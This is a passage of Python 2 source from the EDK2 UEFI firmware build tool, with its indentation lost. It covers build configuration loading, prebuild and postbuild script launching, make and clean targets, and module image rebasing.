# TRICK: hide the output of threads left runing, so that the user can
# catch the error message easily
#
if not BuildTask._ErrorFlag.isSet():
GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
self.BuildItem.BuildObject.Arch,
self.BuildItem.BuildObject.ToolChain,
self.BuildItem.BuildObject.BuildTarget
)
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "%s broken\n %s [%s]" % \
(threading.currentThread().getName(), Command, WorkingDir)
# indicate there's a thread is available for another build task
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue.pop(self.BuildItem)
BuildTask._RunningQueueLock.release()
BuildTask._Thread.release()
## Start build task thread
#
def Start(self):
EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
self.BuildTread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
self.BuildTread.setName("build thread")
self.BuildTread.setDaemon(False)
self.BuildTread.start()
## The class contains the information related to EFI image
#
class PeImageInfo():
## Constructor
#
# Constructor will load all required image information.
#
# @param BaseName The full file path of image.
# @param Guid The GUID for image.
# @param Arch Arch of this image.
# @param OutputDir The output directory for image.
# @param DebugDir The debug directory for image.
# @param ImageClass PeImage Information
#
def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
self.BaseName = BaseName
self.Guid = Guid
self.Arch = Arch
self.OutputDir = OutputDir
self.DebugDir = DebugDir
self.Image = ImageClass
self.Image.Size = (self.Image.Size / 0x1000 + 1) * 0x1000
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parse all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
class Build():
## Constructor
#
# Constructor will load all necessary configurations, parse platform, modules
# and packages and the establish a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
def __init__(self, Target, WorkspaceDir, BuildOptions):
self.WorkspaceDir = WorkspaceDir
self.Target = Target
self.PlatformFile = BuildOptions.PlatformFile
self.ModuleFile = BuildOptions.ModuleFile
self.ArchList = BuildOptions.TargetArch
self.ToolChainList = BuildOptions.ToolChain
self.BuildTargetList= BuildOptions.BuildTarget
self.Fdf = BuildOptions.FdfFile
self.FdList = BuildOptions.RomImage
self.FvList = BuildOptions.FvImage
self.CapList = BuildOptions.CapName
self.SilentMode = BuildOptions.SilentMode
self.ThreadNumber = BuildOptions.ThreadNumber
self.SkipAutoGen = BuildOptions.SkipAutoGen
self.Reparse = BuildOptions.Reparse
self.SkuId = BuildOptions.SkuId
if self.SkuId:
GlobalData.gSKUID_CMD = self.SkuId
self.ConfDirectory = BuildOptions.ConfDirectory
self.SpawnMode = True
self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
self.AutoGenTime = 0
self.MakeTime = 0
self.GenFdsTime = 0
GlobalData.BuildOptionPcd = BuildOptions.OptionPcd if BuildOptions.OptionPcd else []
#Set global flag for build mode
GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
GlobalData.gUseHashCache = BuildOptions.UseHashCache
GlobalData.gBinCacheDest = BuildOptions.BinCacheDest
GlobalData.gBinCacheSource = BuildOptions.BinCacheSource
GlobalData.gEnableGenfdsMultiThread = BuildOptions.GenfdsMultiThread
if GlobalData.gBinCacheDest and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination must be used together with --hash.")
if GlobalData.gBinCacheSource and not GlobalData.gUseHashCache:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-source must be used together with --hash.")
if GlobalData.gBinCacheDest and GlobalData.gBinCacheSource:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, ExtraData="--binary-destination can not be used together with --binary-source.")
if GlobalData.gBinCacheSource:
BinCacheSource = os.path.normpath(GlobalData.gBinCacheSource)
if not os.path.isabs(BinCacheSource):
BinCacheSource = mws.join(self.WorkspaceDir, BinCacheSource)
GlobalData.gBinCacheSource = BinCacheSource
else:
if GlobalData.gBinCacheSource is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-source.")
if GlobalData.gBinCacheDest:
BinCacheDest = os.path.normpath(GlobalData.gBinCacheDest)
if not os.path.isabs(BinCacheDest):
BinCacheDest = mws.join(self.WorkspaceDir, BinCacheDest)
GlobalData.gBinCacheDest = BinCacheDest
else:
if GlobalData.gBinCacheDest is not None:
EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-destination.")
if self.ConfDirectory:
# Get alternate Conf location, if it is absolute, then just use the absolute directory name
ConfDirectoryPath = os.path.normpath(self.ConfDirectory)
if not os.path.isabs(ConfDirectoryPath):
# Since alternate directory name is not absolute, the alternate directory is located within the WORKSPACE
# This also handles someone specifying the Conf directory in the workspace. Using --conf=Conf
ConfDirectoryPath = mws.join(self.WorkspaceDir, ConfDirectoryPath)
else:
if "CONF_PATH" in os.environ:
ConfDirectoryPath = os.path.normcase(os.path.normpath(os.environ["CONF_PATH"]))
else:
# Get standard WORKSPACE/Conf use the absolute path to the WORKSPACE/Conf
ConfDirectoryPath = mws.join(self.WorkspaceDir, 'Conf')
GlobalData.gConfDirectory = ConfDirectoryPath
GlobalData.gDatabasePath = os.path.normpath(os.path.join(ConfDirectoryPath, GlobalData.gDatabasePath))
if BuildOptions.DisableCache:
self.Db = WorkspaceDatabase(":memory:")
else:
self.Db = WorkspaceDatabase(GlobalData.gDatabasePath, self.Reparse)
self.BuildDatabase = self.Db.BuildObject
self.Platform = None
self.ToolChainFamily = None
self.LoadFixAddress = 0
self.UniFlag = BuildOptions.Flag
self.BuildModules = []
self.HashSkipModules = []
self.Db_Flag = False
self.LaunchPrebuildFlag = False
self.PlatformBuildPath = os.path.join(GlobalData.gConfDirectory,'.cache', '.PlatformBuild')
if BuildOptions.CommandLength:
GlobalData.gCommandMaxLength = BuildOptions.CommandLength
# print dot character during doing some time-consuming work
self.Progress = Utils.Progressor()
# print current build environment and configuration
EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
if "PACKAGES_PATH" in os.environ:
# WORKSPACE env has been converted before. Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("PACKAGES_PATH", os.path.normcase(os.path.normpath(os.environ["PACKAGES_PATH"]))))
EdkLogger.quiet("%-16s = %s" % ("ECP_SOURCE", os.environ["ECP_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EDK_SOURCE", os.environ["EDK_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EFI_SOURCE", os.environ["EFI_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
if "EDK_TOOLS_BIN" in os.environ:
# Print the same path style with WORKSPACE env.
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_BIN", os.path.normcase(os.path.normpath(os.environ["EDK_TOOLS_BIN"]))))
EdkLogger.quiet("%-16s = %s" % ("CONF_PATH", GlobalData.gConfDirectory))
self.InitPreBuild()
self.InitPostBuild()
if self.Prebuild:
EdkLogger.quiet("%-16s = %s" % ("PREBUILD", self.Prebuild))
if self.Postbuild:
EdkLogger.quiet("%-16s = %s" % ("POSTBUILD", self.Postbuild))
if self.Prebuild:
self.LaunchPrebuild()
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
if not (self.LaunchPrebuildFlag and os.path.exists(self.PlatformBuildPath)):
self.InitBuild()
EdkLogger.info("")
os.chdir(self.WorkspaceDir)
## Load configuration
#
# This method will parse target.txt and get the build configurations.
#
def LoadConfiguration(self):
#
# Check target.txt and tools_def.txt and Init them
#
BuildConfigurationFile = os.path.normpath(os.path.join(GlobalData.gConfDirectory, gBuildConfiguration))
if os.path.isfile(BuildConfigurationFile) == True:
StatusCode = self.TargetTxt.LoadTargetTxtFile(BuildConfigurationFile)
ToolDefinitionFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_CONF]
if ToolDefinitionFile == '':
ToolDefinitionFile = gToolsDefinition
ToolDefinitionFile = os.path.normpath(mws.join(self.WorkspaceDir, 'Conf', ToolDefinitionFile))
if os.path.isfile(ToolDefinitionFile) == True:
StatusCode = self.ToolDef.LoadToolDefFile(ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=BuildConfigurationFile)
# if no ARCH given in command line, get it from target.txt
if not self.ArchList:
self.ArchList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET_ARCH]
self.ArchList = tuple(self.ArchList)
# if no build target given in command line, get it from target.txt
if not self.BuildTargetList:
self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET]
# if no tool chain given in command line, get it from target.txt
if not self.ToolChainList:
self.ToolChainList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
if self.ToolChainList is None or len(self.ToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")
# check if the tool chains are defined or not
NewToolChainList = []
for ToolChain in self.ToolChainList:
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
else:
NewToolChainList.append(ToolChain)
# if no tool chain available, break the build
if len(NewToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
else:
self.ToolChainList = NewToolChainList
ToolChainFamily = []
ToolDefinition = self.ToolDef.ToolsDefTxtDatabase
for Tool in self.ToolChainList:
if TAB_TOD_DEFINES_FAMILY not in ToolDefinition or Tool not in ToolDefinition[TAB_TOD_DEFINES_FAMILY] \
or not ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool]:
EdkLogger.warn("build", "No tool chain family found in configuration for %s. Default to MSFT." % Tool)
ToolChainFamily.append("MSFT")
else:
ToolChainFamily.append(ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool])
self.ToolChainFamily = ToolChainFamily
if self.ThreadNumber is None:
self.ThreadNumber = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
if self.ThreadNumber == '':
self.ThreadNumber = 0
else:
self.ThreadNumber = int(self.ThreadNumber, 0)
if self.ThreadNumber == 0:
try:
self.ThreadNumber = multiprocessing.cpu_count()
except (ImportError, NotImplementedError):
self.ThreadNumber = 1
if not self.PlatformFile:
PlatformFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_ACTIVE_PLATFORM]
if not PlatformFile:
# Try to find one in current directory
WorkingDirectory = os.getcwd()
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_MISSING,
ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
elif FileNum == 1:
PlatformFile = FileList[0]
else:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")
self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
def InitBuild(self):
# parse target.txt, tools_def.txt, and platform file
self.LoadConfiguration()
# Allow case-insensitive for those from command line or configuration file
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
# create metafile database
if not self.Db_Flag:
self.Db.InitDatabase()
def InitPreBuild(self):
self.LoadConfiguration()
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = self.BuildTargetList[0]
if self.ArchList:
GlobalData.gGlobalDefines['ARCH'] = self.ArchList[0]
if self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = self.ToolChainList[0]
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = self.ToolChainList[0]
if self.ToolChainFamily:
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[0]
if 'PREBUILD' in GlobalData.gCommandLineDefines:
self.Prebuild = GlobalData.gCommandLineDefines.get('PREBUILD')
else:
self.Db.InitDatabase()
self.Db_Flag = True
Platform = self.Db._MapPlatform(str(self.PlatformFile))
self.Prebuild = str(Platform.Prebuild)
if self.Prebuild:
PrebuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Prebuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PrebuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PrebuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PrebuildList.append(Arg)
self.Prebuild = ' '.join(PrebuildList)
self.Prebuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def InitPostBuild(self):
if 'POSTBUILD' in GlobalData.gCommandLineDefines:
self.Postbuild = GlobalData.gCommandLineDefines.get('POSTBUILD')
else:
Platform = self.Db._MapPlatform(str(self.PlatformFile))
self.Postbuild = str(Platform.Postbuild)
if self.Postbuild:
PostbuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Postbuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PostbuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PostbuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PostbuildList.append(Arg)
self.Postbuild = ' '.join(PostbuildList)
self.Postbuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def PassCommandOption(self, BuildTarget, TargetArch, ToolChain, PlatformFile, Target):
BuildStr = ''
if GlobalData.gCommand and isinstance(GlobalData.gCommand, list):
BuildStr += ' ' + ' '.join(GlobalData.gCommand)
TargetFlag = False
ArchFlag = False
ToolChainFlag = False
PlatformFileFlag = False
if GlobalData.gOptions and not GlobalData.gOptions.BuildTarget:
TargetFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.TargetArch:
ArchFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.ToolChain:
ToolChainFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.PlatformFile:
PlatformFileFlag = True
if TargetFlag and BuildTarget:
if isinstance(BuildTarget, list) or isinstance(BuildTarget, tuple):
BuildStr += ' -b ' + ' -b '.join(BuildTarget)
elif isinstance(BuildTarget, str):
BuildStr += ' -b ' + BuildTarget
if ArchFlag and TargetArch:
if isinstance(TargetArch, list) or isinstance(TargetArch, tuple):
BuildStr += ' -a ' + ' -a '.join(TargetArch)
elif isinstance(TargetArch, str):
BuildStr += ' -a ' + TargetArch
if ToolChainFlag and ToolChain:
if isinstance(ToolChain, list) or isinstance(ToolChain, tuple):
BuildStr += ' -t ' + ' -t '.join(ToolChain)
elif isinstance(ToolChain, str):
BuildStr += ' -t ' + ToolChain
if PlatformFileFlag and PlatformFile:
if isinstance(PlatformFile, list) or isinstance(PlatformFile, tuple):
BuildStr += ' -p ' + ' -p '.join(PlatformFile)
elif isinstance(PlatformFile, str):
BuildStr += ' -p' + PlatformFile
BuildStr += ' --conf=' + GlobalData.gConfDirectory
if Target:
BuildStr += ' ' + Target
return BuildStr
def LaunchPrebuild(self):
if self.Prebuild:
EdkLogger.info("\n- Prebuild Start -\n")
self.LaunchPrebuildFlag = True
#
# The purpose of .PrebuildEnv file is capture environment variable settings set by the prebuild script
# and preserve them for the rest of the main build step, because the child process environment will
# evaporate as soon as it exits, we cannot get it in build step.
#
PrebuildEnvFile = os.path.join(GlobalData.gConfDirectory,'.cache','.PrebuildEnv')
if os.path.isfile(PrebuildEnvFile):
os.remove(PrebuildEnvFile)
if os.path.isfile(self.PlatformBuildPath):
os.remove(self.PlatformBuildPath)
if sys.platform == "win32":
args = ' && '.join((self.Prebuild, 'set > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
else:
args = ' && '.join((self.Prebuild, 'env > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Prebuild", PREBUILD_ERROR, 'Prebuild process is not success!')
if os.path.exists(PrebuildEnvFile):
f = open(PrebuildEnvFile)
envs = f.readlines()
f.close()
envs = itertools.imap(lambda l: l.split('=',1), envs)
envs = itertools.ifilter(lambda l: len(l) == 2, envs)
envs = itertools.imap(lambda l: [i.strip() for i in l], envs)
os.environ.update(dict(envs))
EdkLogger.info("\n- Prebuild Done -\n")
def LaunchPostbuild(self):
if self.Postbuild:
EdkLogger.info("\n- Postbuild Start -\n")
if sys.platform == "win32":
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
else:
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Postbuild", POSTBUILD_ERROR, 'Postbuild process is not success!')
EdkLogger.info("\n- Postbuild Done -\n")
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False, FfsCommand={}):
if AutoGenObject is None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile, FfsCommand)
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
makefile = GenMake.BuildFile(AutoGenObject)._FILE_NAME_[GenMake.gMakeType]
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build modules
if BuildModule:
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# build library
if Target == 'libraries':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# build module
if Target == 'modules':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Mod in AutoGenObject.ModuleBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# cleanlib
if Target == 'cleanlib':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# clean
if Target == 'clean':
for Mod in AutoGenObject.ModuleBuildDirectoryList:
ModMakefile = os.path.normpath(os.path.join(Mod, makefile))
if os.path.exists(ModMakefile):
NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError, X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject is None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
#AutoGenObject.CreateAsBuiltInf()
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
# build modules
if BuildModule:
if Target != 'fds':
BuildCommand = BuildCommand + [Target]
AutoGenObject.BuildTime = LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# genfds
if Target == 'fds':
LaunchCommand(AutoGenObject.GenFdsCommand, AutoGenObject.MakeFileDir)
return True
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build library
if Target == 'libraries':
pass
# not build modules
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError, X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Rebase module image and Get function address for the input module list.
#
def _RebaseModule (self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset = True, ModeIsSmm = False):
if ModeIsSmm:
AddrIsOffset = False
for InfFile in ModuleList:
sys.stdout.write (".")
sys.stdout.flush()
ModuleInfo = ModuleList[InfFile]
ModuleName = ModuleInfo.BaseName
ModuleOutputImage = ModuleInfo.Image.FileName
ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
## for SMM module in SMRAM, the SMRAM will be allocated from base to top.
if not ModeIsSmm:
BaseAddress = BaseAddress - ModuleInfo.Image.Size
#
# Update Image to new BaseAddress by GenFw tool
#
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
else:
#
# Set new address to the section header only for SMM driver.
#
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
#
# Collect funtion address from Map file
#
ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
FunctionList = []
if os.path.exists(ImageMapTable):
OrigImageBaseAddress = 0
ImageMap = open(ImageMapTable, 'r')
for LinStr in ImageMap:
if len (LinStr.strip()) == 0:
continue
#
# Get the preferred address set on link time.
#
if LinStr.find ('Preferred load address is') != -1:
StrList = LinStr.split()
OrigImageBaseAddress = int (StrList[len(StrList) - 1], 16)
StrList = LinStr.split()
if len (StrList) > 4:
if StrList[3] == 'f' or StrList[3] == 'F':
Name = StrList[1]
RelativeAddress = int (StrList[2], 16) - OrigImageBaseAddress
FunctionList.append ((Name, RelativeAddress))
if ModuleInfo.Arch == 'IPF' and Name.endswith('_ModuleEntryPoint'):
#
# Get the real entry point address for IPF image.
#
ModuleInfo.Image.EntryPoint = RelativeAddress
ImageMap.close()
#
# Add general information.
#
if ModeIsSmm:
MapBuffer.write('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
elif AddrIsOffset:
MapBuffer.write('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
else:
MapBuffer.write('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
#
# Add guid and general seciton section.
#
TextSectionAddress = 0
DataSectionAddress = 0
for SectionHeader in ModuleInfo.Image.SectionHeaderList:
